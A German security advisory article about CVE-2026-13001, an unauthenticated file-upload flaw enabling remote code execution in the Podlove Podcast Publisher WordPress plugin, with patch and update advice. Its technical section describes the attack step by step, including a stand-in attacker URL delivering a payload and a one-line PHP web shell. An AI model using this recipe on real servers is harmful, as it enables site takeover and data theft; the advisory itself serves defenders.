Veröffentlicht am 14.07.2026
Eine unscheinbare Bild-URL genügt – und Angreifer können die volle Kontrolle über Ihren Webserver übernehmen. Genau das ermöglicht eine kritische Sicherheitslücke im beliebten WordPress-Plugin Podlove Podcast Publisher, die am 14. Juli 2026 vom Sicherheitsdienstleister Wordfence öffentlich gemacht wurde. Die Schwachstelle trägt die Kennung CVE-2026-13001 und erreicht mit einem CVSS-Score von 9,8 von 10 die höchste Gefahrenstufe. Betroffen sind alle Plugin-Versionen bis einschließlich 4.5.1. Wer Podcasts über WordPress veröffentlicht und dieses Plugin nutzt, sollte jetzt handeln.
Das Plugin Podlove Podcast Publisher ist eine der führenden Podcast-Lösungen für WordPress, besonders im deutschsprachigen Raum. Es wird von Podcastern, Medienunternehmen, Bildungseinrichtungen und kleinen und mittleren Unternehmen (KMU) eingesetzt. Laut Wordfence hat das Plugin über 3.000 aktive Installationen und wurde insgesamt 579.923 Mal heruntergeladen.
In allen Versionen bis 4.5.1 steckt ein schwerwiegender Fehler: Über den Parameter podlove_image_cache_url können nicht authentifizierte Angreifer – also Personen ohne jeglichen Login-Zugang zu Ihrer Website – beliebige Dateien auf den Server hochladen. Im schlimmsten Fall führt dies zu Remote Code Execution (RCE), also der Fähigkeit, aus der Ferne beliebigen Programmcode auf Ihrem Server auszuführen. Das bedeutet praktisch die vollständige Übernahme der Website.
Wordfence beschreibt die Lücke in seiner offiziellen Meldung so:
„The Podlove Podcast Publisher plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'podlove_handle_cache_files' function in all versions up to, and including, 4.5.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible." (Wordfence Threat Intelligence)
Die gute Nachricht: Es gibt bereits einen Patch. Version 4.5.2 schließt die Lücke vollständig.
Die Schwachstelle liegt in der Funktion podlove_handle_cache_files in der Datei lib/model/image.php. Vereinfacht gesagt: Das Plugin lädt externe Bilder (etwa Podcast-Cover) von einer angegebenen URL herunter und speichert sie lokal in einem Zwischenspeicher (Cache) im Verzeichnis wp-content/cache/podlove/.
Das Problem war eine sogenannte „Extension Confusion" – eine Verwechslung der Dateiendung. Das Plugin prüfte, ob es sich um ein Bild handelt, anhand eines Dateinamens, der aus der vollständigen URL inklusive des sogenannten Query-Strings (dem Teil hinter dem Fragezeichen) gewonnen wurde. Die tatsächlich gespeicherte Dateiendung leitete es hingegen aus dem reinen URL-Pfad ab. Diese beiden Werte konnten voneinander abweichen.
So sah der Angriff konkret aus: Ein Angreifer übergibt eine URL wie https://evil.example.com/payload.php?.heic. Die Sicherheitsprüfung sieht die Endung .heic (ein gängiges Bildformat) und lässt die Datei durch. Der Cache-Mechanismus speichert die Datei jedoch als *_original.php – also als ausführbare PHP-Datei. In diese Datei kann der Angreifer gültige Bild-Signaturen am Anfang (ein sogenanntes Polyglot) einbauen, gefolgt von schädlichem PHP-Code wie <?php system($_GET["cmd"]); ?>. Ruft er die gespeicherte .php-Datei anschließend über den Browser auf, wird der Code ausgeführt – und der Server ist übernommen.
Der Angriff ist besonders gefährlich, weil er:
Der vollständige CVSS-Vektor lautet: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H – Vertraulichkeit, Integrität und Verfügbarkeit sind allesamt vollständig kompromittierbar.
Plugin-Autor Eric Teubert committete den Fix bereits am 27. Juni 2026 auf GitHub. In seiner Commit-Nachricht erklärt er:
„Fix CVE-2026-13001 by preventing attacker-controlled source URLs from determining executable cache file extensions. […] The cache now only uses safe image extensions, updates the stored extension from the validated downloaded file type, and persists that validated extension in cache metadata for later requests. Existing image cache files are flushed via a database migration so stale executable cache entries are removed on upgrade." (Eric Teubert, GitHub-Commit)
Konkret bestimmt Version 4.5.2 die Dateiendung nun ausschließlich aus der validierten, tatsächlich heruntergeladenen Datei – nicht mehr aus der vom Angreifer kontrollierten URL. Zusätzlich verhindert eine Whitelist sicherer Bildendungen, dass gefährliche Endungen wie .php überhaupt gespeichert werden. Und besonders wichtig: Eine Datenbank-Migration löscht beim Update alle bestehenden Cache-Dateien – so werden auch bereits eingeschleuste Schaddateien automatisch entfernt.
Betroffen sind alle Websites, die das Plugin Podlove Podcast Publisher in Version 4.5.1 oder älter installiert haben. Ob das Plugin aktiviert ist oder nur installiert, ist zweitrangig – entscheidend ist, dass der verwundbare Code auf dem Server liegt.
Alarmierend ist die Vorgeschichte des Plugins: Es weist seit 2023 bereits 24 dokumentierte Sicherheitslücken auf. Erst im September 2025 wurde mit CVE-2025-10147 eine fast identische Lücke (ebenfalls unauthentifizierter Datei-Upload, ebenfalls CVSS 9.8) im Image-Cache gepatcht. Die aktuelle Schwachstelle zeigt, dass der Angriffsvektor damals nicht vollständig geschlossen wurde – ein Hinweis auf strukturelle Schwächen im Cache-Mechanismus.
Zum Zeitpunkt der Veröffentlichung am 14. Juli 2026 lagen keine öffentlich bekannten Exploits oder bestätigten Angriffe in freier Wildbahn vor. Das ist jedoch kein Grund zur Entwarnung – im Gegenteil.
Auch wenn noch keine aktiven Angriffe bekannt sind – die Erfahrung zeigt, dass kritische WordPress-Lücken extrem schnell ausgenutzt werden. Das Whitepaper „State of WordPress Security in 2026" von Patchstack nennt eine erschreckende Zahl:
„The weighted median time to first exploit is 5 hours. This suggests that the most heavily targeted vulnerabilities are typically attacked within hours, not days." (Patchstack)
Ein anschauliches Beispiel liefert der Vergleichsfall CVE-2026-0740 im Plugin Ninja Forms File Upload (ebenfalls CVSS 9.8): Laut Wordfence-Forscher István Márton begannen die Angriffe noch am Tag der Veröffentlichung, und die Wordfence-Firewall blockierte über 118.600 Exploit-Versuche. Automatisierte Scanner durchkämmen das Internet permanent nach verwundbaren Installationen.
Der größere Trend ist ebenfalls beunruhigend: 2025 wurden laut Patchstack 11.334 neue Schwachstellen im WordPress-Ökosystem entdeckt – ein Plus von 42 % gegenüber dem Vorjahr. 91 % davon lagen in Plugins. Und nur 26 % aller Angriffe werden von Standard-Hosting-Sicherheitslösungen abgefangen. Verlassen Sie sich also nicht allein auf Ihren Hoster.
Für Website-Betreiber in Deutschland ist die Lücke nicht nur ein technisches, sondern auch ein rechtliches Risiko. Ein erfolgreicher Angriff bedeutet vollständigen Zugriff auf alle gespeicherten Daten – darunter potenziell personenbezogene Daten wie Kontaktformulardaten, E-Mail-Adressen von Newsletter-Abonnenten, Kommentare oder Bestelldaten.
Wichtig: Nach Art. 32 DSGVO sind Sie ohnehin verpflichtet, „geeignete technische und organisatorische Maßnahmen" zum Datenschutz zu treffen. Das zeitnahe Einspielen von Sicherheits-Updates gehört dazu. Das Unterlassen kann bereits selbst als Verstoß gewertet werden.
CVE-2026-13001 ist eine kritische Lücke der Maximalkategorie: kein Login nötig, leicht ausnutzbar, vollständige Serverübernahme möglich. Dass ein Angriffsvektor im Image-Cache des Podlove-Plugins bereits zum zweiten Mal innerhalb eines Jahres eine RCE-Lücke verursacht hat, unterstreicht die Dringlichkeit.
Die entscheidende Handlung ist einfach: Aktualisieren Sie sofort auf Version 4.5.2. Wer nicht sofort updaten kann, sollte das Plugin deaktivieren. Prüfen Sie zusätzlich Ihre Website auf bereits erfolgte Kompromittierungen und stellen Sie sicher, dass künftige Updates automatisch oder zeitnah eingespielt werden. Angesichts eines Medians von nur fünf Stunden bis zur ersten Ausnutzung zählt jetzt jede Minute.
Quellen: Wordfence Intelligence (CVE-2026-13001), GitHub-Patch-Commit von Podlove, WordPress.org, Patchstack „State of WordPress Security in 2026", CVE.org.